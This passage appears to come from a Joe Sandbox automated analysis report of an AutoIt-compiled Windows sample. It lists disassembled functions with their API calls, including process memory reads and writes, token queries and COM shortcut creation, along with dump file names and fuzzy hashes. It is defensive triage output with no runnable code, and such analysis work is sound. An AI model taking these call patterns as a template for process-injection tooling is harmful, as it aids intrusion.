                                                                                                                    • API String ID: 3225163088-0
                                                                                                                    • Opcode ID: 8752399d7926adc58cabe7bce5e5ee2791d18feb90d478c3666b169a5a73e2e6
                                                                                                                    • Instruction ID: 23ef6379acab8aa38940fea926215c031632152ab76b2a39246fe050c04922d0
                                                                                                                    • Opcode Fuzzy Hash: 8752399d7926adc58cabe7bce5e5ee2791d18feb90d478c3666b169a5a73e2e6
                                                                                                                    • Instruction Fuzzy Hash: 86218C30900668EFDB23CF65ED847697BADFB10729F154326E9109A5F0D3B09891DF90
                                                                                                                    Function 00384A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00384ABA
                                                                                                                    • __beginthreadex.LIBCMT ref: 00384AD8
                                                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00384AED
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00384B03
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00384B0A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3824534824-0
                                                                                                                    • Opcode ID: a94612f80b903d309d5a824418bcf561600450b7ea1cf719cf18861a9d1ed426
                                                                                                                    • Instruction ID: e8cf282c046b923568878463d1e1789fcc3c8e8640e8b6dada4e695241803f15
                                                                                                                    • Opcode Fuzzy Hash: a94612f80b903d309d5a824418bcf561600450b7ea1cf719cf18861a9d1ed426
                                                                                                                    • Instruction Fuzzy Hash: DF110476905359BFCB139FA8AC48A9B7FACEB45324F1443A9F914D7290D675C90087E0
                                                                                                                    Function 00378202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0037821E
                                                                                                                    • GetLastError.KERNEL32(?,00377CE2,?,?,?), ref: 00378228
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00377CE2,?,?,?), ref: 00378237
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,00377CE2,?,?,?), ref: 0037823E
                                                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00378255
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 842720411-0
                                                                                                                    • Opcode ID: fc9f334bc76eec5b9c15ab504cc84dd85e1d8b20f8b88a56f6dc699b8eb6a693
                                                                                                                    • Instruction ID: 11fc92601d912b40c830be691e7754c622d34bcc1e71ede9dc70b8657b803a39
                                                                                                                    • Opcode Fuzzy Hash: fc9f334bc76eec5b9c15ab504cc84dd85e1d8b20f8b88a56f6dc699b8eb6a693
                                                                                                                    • Instruction Fuzzy Hash: 98016971381604BFDB224FA6DC4CD6B7BACEF8A756B504869F809C2260DA318C00CA60
                                                                                                                    Function 0037710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?,?,00377455), ref: 00377127
                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?), ref: 00377142
                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?), ref: 00377150
                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?), ref: 00377160
                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00377044,80070057,?,?), ref: 0037716C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3897988419-0
                                                                                                                    • Opcode ID: 73cede099e3911ba40fd847b0c2d12ef35d768d286bb57c2650810792232dcf0
                                                                                                                    • Instruction ID: c13911243ecd6e3a384a1a28d1bf316d372beaf723c54c3e9fb23b176d64e286
                                                                                                                    • Opcode Fuzzy Hash: 73cede099e3911ba40fd847b0c2d12ef35d768d286bb57c2650810792232dcf0
                                                                                                                    • Instruction Fuzzy Hash: A0018F76601204BFDB224FA4DC44BAA7BADEF45791F158178FD0CD2220DB79DD409BA0
                                                                                                                    Function 00385244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00385260
                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0038526E
                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00385276
                                                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00385280
                                                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003852BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2833360925-0
                                                                                                                    • Opcode ID: 7f8efcd88a38f12b9334a68df4ef3e9fa673833735de85120c3cb89d77f0793d
                                                                                                                    • Instruction ID: 04f45aa7b0513f93b60ba46b51157894885635eb8c7fecdc91c1904304410cb6
                                                                                                                    • Opcode Fuzzy Hash: 7f8efcd88a38f12b9334a68df4ef3e9fa673833735de85120c3cb89d77f0793d
                                                                                                                    • Instruction Fuzzy Hash: 15011735D01A29DBCF02EFE4E849AEDBB7CBB0A711F4109A6E981F2140CF3059548BA1
                                                                                                                    Function 0037810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00378121
                                                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0037812B
                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0037813A
                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00378141
                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00378157
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 44706859-0
                                                                                                                    • Opcode ID: 6e9655673bc66de32f5f1d644c431abe7a04d40d06b931ada12e99edbf9b13fa
                                                                                                                    • Instruction ID: 2725b2a6cf6bc09645d94e5b28ab5c7cde207dc0aad7ead3e5aa75c067063562
                                                                                                                    • Opcode Fuzzy Hash: 6e9655673bc66de32f5f1d644c431abe7a04d40d06b931ada12e99edbf9b13fa
                                                                                                                    • Instruction Fuzzy Hash: 79F04F75340304AFEB220FA5EC8CF673BACEF4A755F414035F949C6150CF659941DA60
                                                                                                                    Function 0037C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0037C1F7
                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0037C20E
                                                                                                                    • MessageBeep.USER32(00000000), ref: 0037C226
                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 0037C242
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0037C25C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3741023627-0
                                                                                                                    • Opcode ID: c1172e8e75f7a5b72bd02015193c9deb7a63e293aa1f477b5126f9fe8296eec7
                                                                                                                    • Instruction ID: a9fe5ddf23db3628bc4c1b902b80c82243b5ea6085fee0b0d264e6085d245a91
                                                                                                                    • Opcode Fuzzy Hash: c1172e8e75f7a5b72bd02015193c9deb7a63e293aa1f477b5126f9fe8296eec7
                                                                                                                    • Instruction Fuzzy Hash: 3E01A730414304ABEB325B90ED4EB96777CBB01706F00466DE586A14F1DBE469448B50
                                                                                                                    Function 003213B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • EndPath.GDI32(?), ref: 003213BF
                                                                                                                    • StrokeAndFillPath.GDI32(?,?,0035B888,00000000,?), ref: 003213DB
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 003213EE
                                                                                                                    • DeleteObject.GDI32 ref: 00321401
                                                                                                                    • StrokePath.GDI32(?), ref: 0032141C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2625713937-0
                                                                                                                    • Opcode ID: 01f2c9fc1624f30b8569b7d52ab0c3f4b80f15778c2831362447398726fba294
                                                                                                                    • Instruction ID: 3850433d5a58c82b2d6ca5a4c1f6fcd24c4fba545056cabd1762387c1cea6943
                                                                                                                    • Opcode Fuzzy Hash: 01f2c9fc1624f30b8569b7d52ab0c3f4b80f15778c2831362447398726fba294
                                                                                                                    • Instruction Fuzzy Hash: 49F01930101A4CEFDB279F66ED8C7583BADAB1132AF088324E569880F1C7704995DF50
                                                                                                                    Function 0038C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0038C432
                                                                                                                    • CoCreateInstance.OLE32(003B2D6C,00000000,00000001,003B2BDC,?), ref: 0038C44A
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                    • CoUninitialize.OLE32 ref: 0038C6B7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 2683427295-24824748
                                                                                                                    • Opcode ID: a395c57aa355080b965f98304f320f587527f6f5359f191f07283bc4197c9772
                                                                                                                    • Instruction ID: 0f53aba3c5c234729a45de8b7d443f1e9952e21dbfa9aea5381bf5b32a949fda
                                                                                                                    • Opcode Fuzzy Hash: a395c57aa355080b965f98304f320f587527f6f5359f191f07283bc4197c9772
                                                                                                                    • Instruction Fuzzy Hash: 9DA14971104205AFD301EF64D881EABB7ECFF89354F00496DF5558B1A2EB71EA49CBA2
                                                                                                                    Function 00332CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00340DB6: std::exception::exception.LIBCMT ref: 00340DEC
                                                                                                                      • Part of subcall function 00340DB6: __CxxThrowException@8.LIBCMT ref: 00340E01
                                                                                                                      • Part of subcall function 00327DE1: _memmove.LIBCMT ref: 00327E22
                                                                                                                      • Part of subcall function 00327A51: _memmove.LIBCMT ref: 00327AAB
                                                                                                                    • __swprintf.LIBCMT ref: 00332ECD
                                                                                                                    Strings
                                                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00332D66
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                    • API String ID: 1943609520-557222456
                                                                                                                    • Opcode ID: 3d532fe5c78e95f63430e943bdae207d89bb1fe17317161f58cd02a0690ca378
                                                                                                                    • Instruction ID: 5adabe07776d755ff829ccc345e145c80b3406ccec86635a23c5ea7f55ba5744
                                                                                                                    • Opcode Fuzzy Hash: 3d532fe5c78e95f63430e943bdae207d89bb1fe17317161f58cd02a0690ca378
                                                                                                                    • Instruction Fuzzy Hash: 4F9157711082119FCB16EF28D896C6FB7A8EF85750F01491DF9969F2A1EB30EE44CB52
                                                                                                                    Function 0038B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00324750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00324743,?,?,003237AE,?), ref: 00324770
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0038B9BB
                                                                                                                    • CoCreateInstance.OLE32(003B2D6C,00000000,00000001,003B2BDC,?), ref: 0038B9D4
                                                                                                                    • CoUninitialize.OLE32 ref: 0038B9F1
                                                                                                                      • Part of subcall function 00329837: __itow.LIBCMT ref: 00329862
                                                                                                                      • Part of subcall function 00329837: __swprintf.LIBCMT ref: 003298AC
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 2126378814-24824748
                                                                                                                    • Opcode ID: f7b979aa7663f1f3c10017d2eecb94c140a9a7a562d8d05abd84052de9a07682
                                                                                                                    • Instruction ID: d428311f3dd2bc7277ce09cdd8c0bb2c8c479c44cd14d2b0b043b050f7ea4d28
                                                                                                                    • Opcode Fuzzy Hash: f7b979aa7663f1f3c10017d2eecb94c140a9a7a562d8d05abd84052de9a07682
                                                                                                                    • Instruction Fuzzy Hash: 25A19A756043129FCB06EF14C484E6ABBE5FF89314F058989F8999B3A1CB31ED45CB91
                                                                                                                    Function 0037B2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0037B4BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ContainedObject
                                                                                                                    • String ID: AutoIt3GUI$Container$%;
                                                                                                                    • API String ID: 3565006973-1131028850
                                                                                                                    • Opcode ID: 93c1e0f1a51e8638f50d37f130d687ed850fb4cfcfbeab1cf09eaecbe8ddac76
                                                                                                                    • Instruction ID: e9c9e11960436d6fa91b585b9b176d32ac5c37984113f3ca56561ba1151a6a24
                                                                                                                    • Opcode Fuzzy Hash: 93c1e0f1a51e8638f50d37f130d687ed850fb4cfcfbeab1cf09eaecbe8ddac76
                                                                                                                    • Instruction Fuzzy Hash: 32915774600601AFDB25CF64C884B6ABBF9FF49710F20856EF94ACB6A1DB74E841CB50
                                                                                                                    Function 0034501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 003450AD
                                                                                                                      • Part of subcall function 003500F0: __87except.LIBCMT ref: 0035012B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorHandling__87except__start
                                                                                                                    • String ID: pow
                                                                                                                    • API String ID: 2905807303-2276729525
                                                                                                                    • Opcode ID: 20cf121e83c1f7da07df2166dac289fa03612829ca9f9c569be2e70541838471
                                                                                                                    • Instruction ID: 546f41442f05fa779cfa83d9e111e94c42d41a7a35c2444a60dfa798ca04fc0a
                                                                                                                    • Opcode Fuzzy Hash: 20cf121e83c1f7da07df2166dac289fa03612829ca9f9c569be2e70541838471
                                                                                                                    • Instruction Fuzzy Hash: EB515A65D08A0187DB1B6B24C94177E2FD8DB40701F208D59E8D58E2FBDF369ACC9A86
                                                                                                                    Function 00368584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: 3c3$_3
                                                                                                                    • API String ID: 4104443479-176681986
                                                                                                                    • Opcode ID: 2b9c9758c9e5b3ccce3728aee3bce3484c89275494b5a5e00127d864462a227f
                                                                                                                    • Instruction ID: ed5d4625f9d9ce88d4d4b85745fd80867c60992f91f0bbe6b37c9ac4611141cd
                                                                                                                    • Opcode Fuzzy Hash: 2b9c9758c9e5b3ccce3728aee3bce3484c89275494b5a5e00127d864462a227f
                                                                                                                    • Instruction Fuzzy Hash: FC517E70E006099FCF26CF68C880AAEB7F5FF45304F158529E95ADB254EB30B995CB51
                                                                                                                    Function 003797F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 003814BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00379296,?,?,00000034,00000800,?,00000034), ref: 003814E6
                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0037983F
                                                                                                                      • Part of subcall function 00381487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003792C5,?,?,00000800,?,00001073,00000000,?,?), ref: 003814B1
                                                                                                                      • Part of subcall function 003813DE: GetWindowThreadProcessId.USER32(?,?), ref: 00381409
                                                                                                                      • Part of subcall function 003813DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0037925A,00000034,?,?,00001004,00000000,00000000), ref: 00381419
